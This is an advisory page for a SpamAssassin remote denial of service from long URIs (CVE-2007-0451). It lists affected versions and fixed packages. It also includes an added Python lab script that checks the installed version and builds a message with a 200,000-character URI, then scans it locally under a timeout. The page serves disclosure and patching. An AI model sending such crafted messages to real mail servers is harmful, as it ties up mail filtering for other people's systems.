SpamAssassin Long URI Handling Remote Denial of Service Vulnerability
BID:22584
Info
| Bugtraq ID: | 22584 |
| Class: | Unknown |
| CVE: | CVE-2007-0451 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 13 2007 12:00AM |
| Updated: | Mar 19 2015 08:26AM |
| Credit: | The vendor reported this vulnerability. |
| Vulnerable: |
- SuSE SUSE Linux Enterprise Server SDK 9
- SuSE SUSE Linux Enterprise Server 9 SP3
- SuSE SUSE Linux Enterprise Server 9
- SuSE SUSE Linux Enterprise Server 10
- SuSE SUSE Linux Enterprise SDK 9
- SuSE SUSE Linux Enterprise SDK 10
- SuSE SUSE Linux Enterprise Desktop 10
- SuSE Linux Professional 10.2 x86_64
- SuSE Linux Personal 10.2 x86_64
- SpamAssassin SpamAssassin 3.1.7
- SpamAssassin SpamAssassin 3.1.6
- SpamAssassin SpamAssassin 3.1.5
- SpamAssassin SpamAssassin 3.1.4
- SpamAssassin SpamAssassin 3.1.3
- SpamAssassin SpamAssassin 3.1.2
- SpamAssassin SpamAssassin 3.1.1
- SpamAssassin SpamAssassin 3.1
- S.u.S.E. UnitedLinux 1.0
- S.u.S.E. SuSE Linux Standard Server 8.0
- S.u.S.E. SuSE Linux School Server for i386
- S.u.S.E. SUSE LINUX Retail Solution 8.0
- S.u.S.E. SuSE Linux Openexchange Server 4.0
- S.u.S.E. SuSE Linux Open-Xchange 4.1
- S.u.S.E. SUSE CORE 9 for x86
- S.u.S.E. openSUSE 10.2
- S.u.S.E. Open-Enterprise-Server 9.0
- S.u.S.E. Open-Enterprise-Server 1
- S.u.S.E. Open-Enterprise-Server 0
- S.u.S.E. Office Server
- S.u.S.E. Novell Linux POS 9
- S.u.S.E. Novell Linux Desktop 9.0
- S.u.S.E. Novell Linux Desktop 1.0
- S.u.S.E. Linux Professional 10.0 OSS
- S.u.S.E. Linux Professional 10.0
- S.u.S.E. Linux Professional 10.2
- S.u.S.E. Linux Professional 10.1
- S.u.S.E. Linux Personal 10.0 OSS
- S.u.S.E. Linux Personal 10.2
- S.u.S.E. Linux Personal 10.1
- S.u.S.E. Linux Openexchange Server
- S.u.S.E. Linux Office Server
- S.u.S.E. Linux Enterprise Server for S/390 9.0
- S.u.S.E. Linux Enterprise Server for S/390
- S.u.S.E. Linux Desktop 1.0
- S.u.S.E. Linux Desktop 10
- S.u.S.E. Linux Database Server 0
- S.u.S.E. Linux Connectivity Server
- S.u.S.E. Linux 10.1 x86-64
- S.u.S.E. Linux 10.1 x86
- S.u.S.E. Linux 10.1 ppc
- S.u.S.E. Linux 10.0 x86-64
- S.u.S.E. Linux 10.0 x86
- S.u.S.E. Linux 10.0 ppc
- rPath rPath Linux 1
- RedHat Enterprise Linux WS 4
- RedHat Enterprise Linux ES 4
- Red Hat Enterprise Linux Desktop 5 client
- Red Hat Enterprise Linux AS 4
- Red Hat Enterprise Linux 5 Server
- Pardus Linux 2007.1
- Mandriva Linux Mandrake 2007.0 x86_64
- Mandriva Linux Mandrake 2007.0
- MandrakeSoft Corporate Server 4.0 x86_64
- MandrakeSoft Corporate Server 4.0
- Gentoo mail-filter/spamassassin 3.1.7
|
| Not Vulnerable: |
- SpamAssassin SpamAssassin 3.1.8
- Gentoo mail-filter/spamassassin 3.1.8
|
Discussion
SpamAssassin is prone to a remote denial-of-service vulnerability.
This issue arises when the application handles excessively long URIs. Scanning a message that contains such a URI takes an excessive amount of processing time, tying up the scanning process (and, on a busy spamd, delaying the mail queued behind it). Because SpamAssassin is normally run automatically on every inbound message, the recipient does not have to open or act on the message; delivering it to a scanned mailbox is enough.
SpamAssassin versions prior to 3.1.8 are vulnerable to this issue.
Exploit / POC
An attacker can use an ordinary email client to craft a message that is sufficient to trigger this vulnerability; the message only needs to contain an excessively long URI and be delivered to a mailbox that a vulnerable SpamAssassin installation scans.
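The following Python script is an added example for this page; it is not code from the SpamAssassin project or from the original advisory. It gives a mail administrator two lab checks: a version test that decides whether the output of spamassassin --version on a host falls before the fixed release 3.1.8 (compared field by field, so that 3.1.10 is correctly treated as newer than 3.1.8), and a constructed test message carrying one very long http URI of the kind the advisory describes, which scan_with_timeout() feeds to the local spamassassin -t command under a wall-clock bound so the scan time before and after the upgrade can be compared on a test host. The sample version output, the example.test addresses, the URI length and the 30-second bound are assumptions chosen for illustration.

```python
"""Added lab check for BID 22584 / CVE-2007-0451: version test plus a
constructed long-URI message scanned under a timeout. Not project code."""
import re
import subprocess
import time

# First release that fixes the long-URI handling issue (from the advisory).
FIXED_VERSION = (3, 1, 8)


def parse_sa_version(version_output):
    """Return (major, minor, patch) from `spamassassin --version` output.

    Assumed first-line format: 'SpamAssassin version 3.1.7'.
    """
    m = re.search(r"SpamAssassin version (\d+)\.(\d+)\.(\d+)", version_output)
    if m is None:
        raise ValueError("unrecognised version output: %r" % version_output)
    return tuple(int(part) for part in m.groups())


def is_vulnerable(version):
    """True when the installed version is older than 3.1.8.

    Tuples compare numerically field by field, so (3, 1, 10) is newer than
    (3, 1, 8); a plain string comparison would get that wrong.
    """
    return tuple(version) < FIXED_VERSION


def build_long_uri_message(uri_length=200000):
    """Build a raw RFC 822-style message whose body holds one very long URI.

    The body line deliberately exceeds the 998-character line limit: the
    advisory's trigger is the length of the URI itself. The addresses and
    the default length are constructed values for this example.
    """
    prefix = "http://example.test/"
    long_uri = prefix + "a" * max(0, uri_length - len(prefix))
    headers = (
        "From: sender@example.test\n"
        "To: victim@example.test\n"
        "Subject: BID 22584 long-URI scan test\n"
        "MIME-Version: 1.0\n"
        "Content-Type: text/plain; charset=us-ascii\n"
    )
    body = "Please see " + long_uri + "\n"
    return (headers + "\n" + body).encode("ascii")


def scan_with_timeout(raw_message, timeout_s=30, spamassassin_bin="spamassassin"):
    """Feed the message to `spamassassin -t` (test mode, message on stdin).

    Returns (timed_out, elapsed_seconds). On an unpatched 3.1.x host the
    scan is expected to run far longer than a scan of a short message, or
    to hit the timeout; on 3.1.8 it should return promptly.
    """
    start = time.monotonic()
    try:
        subprocess.run(
            [spamassassin_bin, "-t"],
            input=raw_message,
            capture_output=True,
            timeout=timeout_s,
            check=False,
        )
    except subprocess.TimeoutExpired:
        # subprocess.run kills the child when the timeout expires.
        return True, time.monotonic() - start
    return False, time.monotonic() - start


if __name__ == "__main__":
    out = subprocess.run(
        ["spamassassin", "--version"], capture_output=True, text=True, check=False
    ).stdout
    installed = parse_sa_version(out)
    print("installed SpamAssassin %s: %s" % (
        ".".join(str(p) for p in installed),
        "VULNERABLE (older than 3.1.8)" if is_vulnerable(installed) else "fixed",
    ))
    timed_out, elapsed = scan_with_timeout(build_long_uri_message())
    print("long-URI scan: timed_out=%s elapsed=%.1fs" % (timed_out, elapsed))
```

Run it only against a test host you own. A scan that hits the timeout, or that takes far longer than a scan of a short message, reproduces the behaviour on an unpatched 3.1.x host; after upgrading to 3.1.8 and restarting spamd, the same message should be scored quickly. The version check on its own is enough for an inventory pass across a fleet.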
Solution / Fix
Solution:
The vendor has released version 3.1.8 to address this issue. Upgrade any SpamAssassin 3.1.x installation earlier than 3.1.8, either from the upstream source tarball or from the distribution packages listed below, and restart a running spamd afterwards so that the daemon's already-loaded copy of the old code is replaced. Confirm the result with spamassassin --version.
SpamAssassin SpamAssassin 3.1
- RedHat Fedora spamassassin-3.1.8-1.fc5.i386.rpm (Fedora Core 5)
  http://download.fedora.redhat.com/pub/fedora/linux/core/updates/5/
- RedHat Fedora spamassassin-3.1.8-1.fc5.ppc.rpm (Fedora Core 5)
  http://download.fedora.redhat.com/pub/fedora/linux/core/updates/5/
- RedHat Fedora spamassassin-3.1.8-1.fc5.x86_64.rpm (Fedora Core 5)
  http://download.fedora.redhat.com/pub/fedora/linux/core/updates/5/
- RedHat Fedora spamassassin-debuginfo-3.1.8-1.fc5.i386.rpm (Fedora Core 5)
  http://download.fedora.redhat.com/pub/fedora/linux/core/updates/5/
- RedHat Fedora spamassassin-debuginfo-3.1.8-1.fc5.ppc.rpm (Fedora Core 5)
  http://download.fedora.redhat.com/pub/fedora/linux/core/updates/5/
- SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
  http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAssassin-3.1.8.tar.gz

SpamAssassin SpamAssassin 3.1.1
- SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
  http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAssassin-3.1.8.tar.gz

SpamAssassin SpamAssassin 3.1.2
- SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
  http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAssassin-3.1.8.tar.gz

SpamAssassin SpamAssassin 3.1.3
- SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
  http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAssassin-3.1.8.tar.gz

SpamAssassin SpamAssassin 3.1.4
- RedHat Fedora spamassassin-3.1.8-1.fc6.i386.rpm (Fedora Core 6)
  http://download.fedora.redhat.com/pub/fedora/linux/core/updates/6/
- RedHat Fedora spamassassin-3.1.8-1.fc6.ppc.rpm (Fedora Core 6)
  http://download.fedora.redhat.com/pub/fedora/linux/core/updates/6/
- RedHat Fedora spamassassin-3.1.8-1.fc6.x86_64.rpm (Fedora Core 6)
  http://download.fedora.redhat.com/pub/fedora/linux/core/updates/6/
- RedHat Fedora spamassassin-debuginfo-3.1.8-1.fc6.i386.rpm (Fedora Core 6)
  http://download.fedora.redhat.com/pub/fedora/linux/core/updates/6/
- RedHat Fedora spamassassin-debuginfo-3.1.8-1.fc6.ppc.rpm (Fedora Core 6)
  http://download.fedora.redhat.com/pub/fedora/linux/core/updates/6/
- RedHat Fedora spamassassin-debuginfo-3.1.8-1.fc6.x86_64.rpm (Fedora Core 6)
  http://download.fedora.redhat.com/pub/fedora/linux/core/updates/6/
- SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
  http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAssassin-3.1.8.tar.gz

SpamAssassin SpamAssassin 3.1.5
- SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
  http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAssassin-3.1.8.tar.gz

SpamAssassin SpamAssassin 3.1.6
- SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
  http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAssassin-3.1.8.tar.gz

SpamAssassin SpamAssassin 3.1.7
- SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
  http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAssassin-3.1.8.tar.gz
References
References:
- Apache SpamAssassin 3.1.8 available! (SpamAssassin)
- SpamAssassin Home Page (SpamAssassin)
- RHSA-2007:0074-2 (Red Hat)
- RHSA-2007:0075-2 spamassassin security update (Red Hat)
- RHSA-2007:0492-2 (Red Hat)